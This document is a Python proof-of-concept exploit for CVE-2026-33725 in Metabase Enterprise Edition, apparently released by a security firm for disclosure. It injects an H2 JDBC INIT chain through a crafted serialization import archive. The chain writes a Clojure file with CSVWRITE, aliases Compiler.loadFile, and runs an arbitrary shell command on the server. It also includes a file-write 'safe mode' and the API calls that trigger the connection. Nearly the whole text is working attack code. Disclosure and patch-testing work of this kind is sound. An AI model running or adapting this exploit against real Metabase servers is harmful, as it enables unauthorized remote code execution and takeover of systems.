README.md
Rendering markdown...
# Hakai Security - https://hakaisecurity.io
# Authors:
# - Diego Tellaroli <[email protected]>
# - Guilherme d'Ávila <[email protected]>
# - Gabriel Rodrigues <[email protected]>
#
# Created on: 2026-04-20
# Description: Exploit for CVE-2026-33725 - Metabase vulnerable to RCE and Arbitrary File Read via H2 JDBC INIT Injection in EE Serialization Import
#!/usr/bin/env python3
import argparse, io, tarfile, time, requests, urllib3
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
TS = int(time.time())
def banner():
b = """
_____________________________________________________________________________________
______ ___ _________ ___ ____ _____
___ / / /_/ |___/ //_/_/ |__/ _/ / RCE and Arbitrary File Read in Metabase /
__ /_/ /__ /| |__ , <__ /| | _/ / / CVE - 2026 - 33725 /
_ __ /_ ___ |_ /| |_ ___ |__/ / / https://hakaisecurity.io /
/_/ /_/ /_/ |_|/_/ |_|/_/ |_|/___/ / /
________________________________________________________________________________
"""
print(b)
def db_yaml(name, subname):
return f"""\
name: {name}
engine: h2
description: poc
settings: {{}}
serdes/meta:
- id: {name}
model: Database
details:
db: mem:x
subname: |-
{subname}
"""
def cmd_to_clj(cmd):
"""Encode string as Clojure char literals to avoid quotes in CSVWRITE output.
Double backslash because H2 URL parser strips one level: \\\\c -> \\c."""
special = {' ': 'space', '\n': 'newline', '\t': 'tab'}
parts = []
for c in cmd:
if c in special:
parts.append(f"\\\\{special[c]}")
elif c == '\\':
parts.append("\\\\\\\\")
else:
parts.append(f"\\\\{c}")
return "(str " + " ".join(parts) + ")"
def build_rce_clj(cmd):
"""Build Clojure source that runs an OS command via clojure.java.shell/sh."""
return (
"(require (quote clojure.java.shell))"
f"(clojure.java.shell/sh {cmd_to_clj('/bin/sh')} {cmd_to_clj('-c')} {cmd_to_clj(cmd)})"
)
def build_targz(entries):
"""entries: list of (db_name, yaml_content)."""
buf = io.BytesIO()
with tarfile.open(fileobj=buf, mode="w:gz") as tar:
for d in ["export/", "export/databases/"]:
ti = tarfile.TarInfo(d); ti.type = tarfile.DIRTYPE; tar.addfile(ti)
for name, yaml in entries:
d = f"export/databases/{name}/"
ti = tarfile.TarInfo(d); ti.type = tarfile.DIRTYPE; tar.addfile(ti)
data = yaml.encode()
ti = tarfile.TarInfo(f"export/databases/{name}/{name}.yaml")
ti.size = len(data)
tar.addfile(ti, io.BytesIO(data))
buf.seek(0)
return buf
def find_db(s, base, name):
r = s.get(f"{base}/api/database")
if r.ok:
for db in r.json().get("data", r.json() if isinstance(r.json(), list) else []):
if db.get("name") == name:
return db["id"]
return None
def delete_db(s, base, name):
db_id = find_db(s, base, name)
if db_id:
s.delete(f"{base}/api/database/{db_id}")
def trigger(s, base, db_id):
"""Force JDBC connection -> fires H2 INIT."""
s.post(f"{base}/api/database/{db_id}/sync_schema")
s.post(f"{base}/api/database/{db_id}/rescan_values")
s.post(f"{base}/api/dataset", json={
"database": db_id, "type": "native", "native": {"query": "SELECT 1"}
})
def do_import(s, base, entries):
"""Import tar.gz, return (status_code, body)."""
s.headers.pop("Content-Type", None)
r = s.post(f"{base}/api/ee/serialization/import",
files={"file": ("export.tar.gz", build_targz(entries), "application/gzip")})
s.headers["Content-Type"] = "application/json"
return r.status_code, r.text[:3000]
def main():
banner()
p = argparse.ArgumentParser(description="CVE-2026-33725: H2 INIT injection via EE serdes import")
p.add_argument("url", help="Metabase base URL")
p.add_argument("token", help="Admin session token")
p.add_argument("--cmd", help="OS command for RCE (Clojure loadFile, no javac)")
p.add_argument("--outfile", default="/tmp/metabase_poc_pwned.txt", help="Proof file (safe mode)")
p.add_argument("--dry-run", action="store_true", help="Only check endpoint")
p.add_argument("--proxy", help="HTTP proxy")
a = p.parse_args()
base = a.url.rstrip("/")
s = requests.Session()
s.headers.update({"Content-Type": "application/json", "X-Metabase-Session": a.token})
if a.proxy:
s.proxies = {"http": a.proxy, "https": a.proxy}; s.verify = False
# Check EE
r = s.post(f"{base}/api/ee/serialization/import")
if r.status_code == 404:
print("[SAFE] OSS build — endpoint not available"); return
elif r.status_code == 402:
print("[INFO] EE build (needs license)")
else:
print(f"[INFO] Endpoint returned HTTP {r.status_code}")
if a.dry_run:
return
if a.cmd:
# ── RCE: single-INIT three-statement chain ──
# All in one file-based H2 INIT: CSVWRITE -> CREATE ALIAS -> CALL loadFile
# File-based H2 serializes connections, avoiding CREATE ALIAS race.
print(f"[INFO] RCE: {a.cmd}")
clj_file = f"/tmp/.poc_{TS}.clj"
h2_file = f"/tmp/.poc_{TS}_h2"
name = f"poc_rce_{TS}"
clj_src = build_rce_clj(a.cmd)
sql_inner = clj_src.replace("'", "''''")
csvwrite = f"CALL CSVWRITE('{clj_file}', 'SELECT ''{sql_inner}'' AS c', 'writeColumnHeader=false fieldDelimiter=')"
create_alias = 'CREATE ALIAS IF NOT EXISTS LOADCLJ FOR "clojure.lang.Compiler.loadFile"'
call_load = f"CALL LOADCLJ('{clj_file}')"
# \; separates statements in H2 INIT
subname = f"{h2_file};INIT={csvwrite}\\;{create_alias}\\;{call_load}"
delete_db(s, base, name)
code, body = do_import(s, base, [(name, db_yaml(name, subname))])
print(f"[INFO] Import: HTTP {code}")
if code == 402:
print("[INFO] License required"); return
if code != 200 or "assert-not-h2" in body.lower():
print(body[:500]); print("[SAFE] Patched or import failed"); return
time.sleep(2)
db_id = find_db(s, base, name)
if db_id:
trigger(s, base, db_id)
print(f"\n[VULN] RCE via H2 INIT subname bypass + Clojure loadFile")
print(f"[INFO] Verify: check if '{a.cmd}' executed on the server")
else:
print("[WARN] DB not found after import")
else:
# ── Safe mode: CSVWRITE proof file ──
name = f"poc_safe_{TS}"
sub = f"mem:s{TS};INIT=CALL CSVWRITE('{a.outfile}', 'SELECT ''PWNED_VIA_H2_INIT'' AS result')"
delete_db(s, base, name)
code, body = do_import(s, base, [(name, db_yaml(name, sub))])
print(f"[INFO] Import: HTTP {code}")
if code == 402:
print("[INFO] License required"); return
if code != 200:
print(body[:500]); return
if "assert-not-h2" in body.lower():
print("[SAFE] Patched (H2 rejected)"); return
time.sleep(2)
db_id = find_db(s, base, name)
if db_id:
trigger(s, base, db_id)
print(f"\n[VULN] CSVWRITE via H2 INIT subname bypass")
print(f"[INFO] Check: {a.outfile}")
else:
print("[WARN] DB not found after import")
if __name__ == "__main__":
main()